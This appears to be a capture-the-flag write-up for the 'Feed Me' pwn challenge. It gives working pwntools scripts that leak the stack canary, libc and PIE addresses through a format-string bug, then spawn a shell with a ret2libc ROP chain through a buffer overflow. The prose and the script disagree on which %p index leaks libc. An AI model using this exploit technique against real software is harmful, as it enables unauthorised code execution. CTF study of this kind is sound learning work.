CSC2023 - [Pwn] - Feed Me


Challenge Description

I don't have control on myself. Sometimes, I can control, otherwise I can't

Solution

First of all, we check the protections on the binary.

[screenshot: checksec output]

All protections are enabled 😡

Let us run the binary.

[screenshot: running the binary]

There is a format string vulnerability.

We need to find the libc base in order to get a shell.

from pwn import *
context.log_level = 'error'
elf = context.binary = ELF('./feedmepwn')

# Leak one stack slot per run with %N$p. The AAAAAAAA marker shows where our
# own buffer lands on the stack; the other values are candidate libc, PIE,
# stack and canary values.
for i in range(1, 50):
    io = process()
    payload = f"AAAAAAAA.%{i}$p"
    io.sendline(payload.encode())
    io.sendline(b'dasfsaf')  # second read (the overflow input); junk is fine here
    print(io.recvall(), i)
    io.close()

[screenshot: leak loop output]

As a tip for telling the leaked values apart:

0x7f... - libc
0x7ff... - stack
0x5... - PIE (the binary itself)
8-byte value ending in 00 - canary

Libc Base

[screenshot: libc leak]

Use xinfo <address> in pwndbg to get the offset of the leaked address from the start of libc.

[screenshot: pwndbg xinfo output]

Here the offset is 0x29d90.

Now, after subtracting the offset from the address leaked by %27$p, we get our libc base.
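As an added example (not the writeup's own code): a small Python helper that applies the tip above to the leak loop's output and then does the offset subtraction from this section, with a page-alignment check that catches a wrong index or offset. The indices 23/25/27 and the offsets 0x29d90 and 0x11c9 are the ones used in the final script; the sample lines and values are constructed, not captured from the real binary.

```python
import re

# Constructed sample of what the leak loop prints (repr of the program
# output followed by the %i index); not output from the real binary.
SAMPLE_OUTPUT = """\
b'AAAAAAAA.0x9a3c4e8f2b7d1a00\\n' 23
b'AAAAAAAA.0x7f3a1c4d9d90\\n' 25
b'AAAAAAAA.0x55d0e1a811c9\\n' 27
b'AAAAAAAA.0x7ffd4e8b1f10\\n' 29
b'AAAAAAAA.(nil)\\n' 31
"""

LINE_RE = re.compile(r"AAAAAAAA\.(0x[0-9a-fA-F]+|\(nil\)).*?\s(\d+)\s*$")

def parse_leaks(text):
    """Map format-string index -> leaked value string from the loop's output."""
    leaks = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            leaks[int(m.group(2))] = m.group(1)
    return leaks

def classify(value):
    """Bucket a leaked %p value with the prefix heuristics from the tip."""
    if value == "(nil)":
        return "nil"
    h = format(int(value, 16), "x")
    if len(h) == 16 and h.endswith("00"):  # full 64-bit word, low byte zero
        return "canary"
    if h.startswith("7ff"):                # 0x7ff... -> stack
        return "stack"
    if h.startswith("7f"):                 # 0x7f... -> libc (mmap region)
        return "libc"
    if h.startswith("5"):                  # 0x5... -> PIE (heap sits here too)
        return "pie"
    return "unknown"

def compute_bases(leaks, libc_index=25, libc_offset=0x29d90,
                  exe_index=27, exe_offset=0x11c9):
    """Subtract the xinfo offsets; a base that is not page aligned means
    the index or the offset is wrong."""
    libc_base = int(leaks[libc_index], 16) - libc_offset
    exe_base = int(leaks[exe_index], 16) - exe_offset
    aligned = (libc_base & 0xfff) == 0 and (exe_base & 0xfff) == 0
    return {"libc_base": libc_base, "exe_base": exe_base, "aligned": aligned}

if __name__ == "__main__":
    leaks = parse_leaks(SAMPLE_OUTPUT)
    for idx, val in sorted(leaks.items()):
        print(f"%{idx}$p -> {val} ({classify(val)})")
    print({k: (hex(v) if isinstance(v, int) else v)
           for k, v in compute_bases(leaks).items()})
```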

Final Script 🔥

#!/usr/bin/env python3

from pwn import *

context.update(os="linux", arch="amd64")

r = process("./feedmepwn")
libc = ELF("./libc.so.6", checksec=False)

# Stack slots found with the leak loop:
# 23 is canary
# 25 leaks libc_base+171408 (0x29d90)
# 27 leaks exe_base+4553 (0x11c9)

payload = b"%23$p.%25$p.%27$p"
log.info(f"Sending payload: {payload.decode()}")
r.sendline(payload)

# The program echoes our input after " - "; split the three leaks back out
leak = r.recvline().decode().rstrip().split(" - ")[1]
canary, libc_leak, exe_leak = leak.split(".")
canary = int(canary, 16)
libc_leak = int(libc_leak, 16)
exe_leak = int(exe_leak, 16)
libc_base = libc_leak - 0x29d90
exe_base = exe_leak - 0x11c9
log.success("Got leaks!")
log.info(f"\tcanary = {hex(canary)}")
log.info(f"\tlibc_base = {hex(libc_base)}")
log.info(f"\texe_base = {hex(exe_base)}")

libc.address = libc_base
libc_rop = ROP(libc)

BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
POP_RDI = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_rop.find_gadget(['ret'])[0]  # extra ret keeps the stack 16-byte aligned for system()

offset_to_canary = 136

# Fill up to the canary, put the leaked canary back, overwrite saved rbp, then ret2libc
payload = b""
payload += b"A" * offset_to_canary
payload += p64(canary)
payload += p64(0)  # saved rbp
payload += p64(ret)
payload += p64(POP_RDI)
payload += p64(BINSH)
payload += p64(SYSTEM)
payload += p64(EXIT)
# Alternative payload (unused): return straight to libc_base+0xf1f2f
payload1 = cyclic(136) + pack(canary) + pack(0) + pack(libc_base + 0xf1f2f)

log.info("Sending ret2libc payload!")

r.sendline(payload)
log.success("Enjoy your shell :)")
r.interactive()

[screenshot: shell obtained]

Flag

CSC{G00d_C0mb1n4ti0n_0f_f0rm4t_Str1ngs_4nd_Buff3r_Ov3rfl0w}

Writeups 2023 © RootxRAN.